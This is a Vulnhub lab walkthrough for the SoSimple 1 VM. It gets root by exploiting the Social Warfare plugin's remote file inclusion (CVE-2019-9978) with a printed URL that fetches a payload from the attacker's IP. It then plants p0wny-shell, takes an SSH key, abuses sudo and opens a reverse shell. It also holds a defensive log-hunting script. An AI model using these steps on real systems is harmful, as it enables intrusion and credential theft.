SoSimple 1 CTF — Vulnhub walkthrough
In this guide I’ll show you how to get the 3 flags for this VM.
You can download the VM from https://www.vulnhub.com/entry/so-simple-1,515/ and load the .ova into VirtualBox; once it boots, it greets us with the IP:
Running Nmap against it reveals ports 80 and 22:
We don’t have much info for SSH so I’ll go after 80 first:
To speed things up I fire up OpenVAS (it might seem like overkill, but I had it open when I started working on this VM) and scan the site. This shows that there is a WordPress instance set up in a folder:
We run WPScan to get a first pass:
The Social-Warfare plugin is outdated:
Exploit-DB has an exploit for that version (https://www.exploit-db.com/exploits/46794 | https://github.com/hash3liZer/CVE-2019-9978).
If you read through the script (I like seeing how things are done…) you’ll notice it crafts a URL like this:
http://192.168.0.151/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.0.102:8000/payload.txt
where .151 is the victim’s address and .102 is the attacker’s IP, so I set up a local web server and used the payload from the example to see all users:
Running ls will reveal that we’re inside /wordpress/wp-admin, so I’ll have it download p0wny-shell to that folder.
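On the defender's side, the admin-post.php request shown above is distinctive enough to hunt for in web server access logs. The following is an added example, not part of the original walkthrough or the exploit script: the log lines are constructed, the combined log format is assumed, and the function name find_swp_requests is hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not taken from the VM.
SAMPLE_LOG = """\
192.168.0.102 - - [10/Aug/2020:10:01:02 +0000] "GET /wordpress/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.0.102 - - [10/Aug/2020:10:03:15 +0000] "GET /wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.0.102:8000/payload.txt HTTP/1.1" 500 0 "-" "python-requests/2.24.0"
192.168.0.50 - - [10/Aug/2020:10:04:00 +0000] "POST /wordpress/wp-admin/admin-post.php?action=save HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.0.102 - - [10/Aug/2020:10:05:40 +0000] "GET /wordpress/wp-admin/admin-post.php?swp_url=http%3A%2F%2F192.168.0.102%3A8000%2Fpayload.txt&swp_debug=load_options HTTP/1.1" 200 12 "-" "curl/7.68.0"
"""

# client, timestamp, method and request target of one combined-format line
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)


def find_swp_requests(log_text):
    """Return requests that ask Social Warfare to load options from a remote URL."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/wp-admin/admin-post.php"):
            continue
        # parse_qs percent-decodes values, so encoded variants are caught
        # and parameter order does not matter.
        params = parse_qs(url.query)
        if "load_options" not in params.get("swp_debug", []):
            continue
        for remote in params.get("swp_url", []):
            hits.append({
                "src": m.group("src"),
                "time": m.group("ts"),
                "swp_url": remote,
                # host the WordPress server was told to fetch from
                "fetched_from": urlsplit(remote).netloc,
            })
    return hits


if __name__ == "__main__":
    for hit in find_swp_requests(SAMPLE_LOG):
        print(hit["time"], hit["src"], "->", hit["swp_url"])
```

The fetched_from value is also worth matching against outbound connection logs from the web server, since the plugin retrieves the file itself.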
Once that is up, we can look around the server:
The WordPress base folder contains secretkey.txt:
Digging through the “max” user’s folder:
If we go into the .ssh folder we can extract his RSA key and use it to authenticate via SSH:
LinEnum didn’t reveal much, so we check sudo permissions with sudo -l. max can run service as steven, so we use that to launch bash:
Following the same pattern, we see that steven can run a .sh as root:
We set up a netcat listener and run a Python reverse shell:
We have now managed to get to root:
And the final flag for this challenge!
Thank you for reading!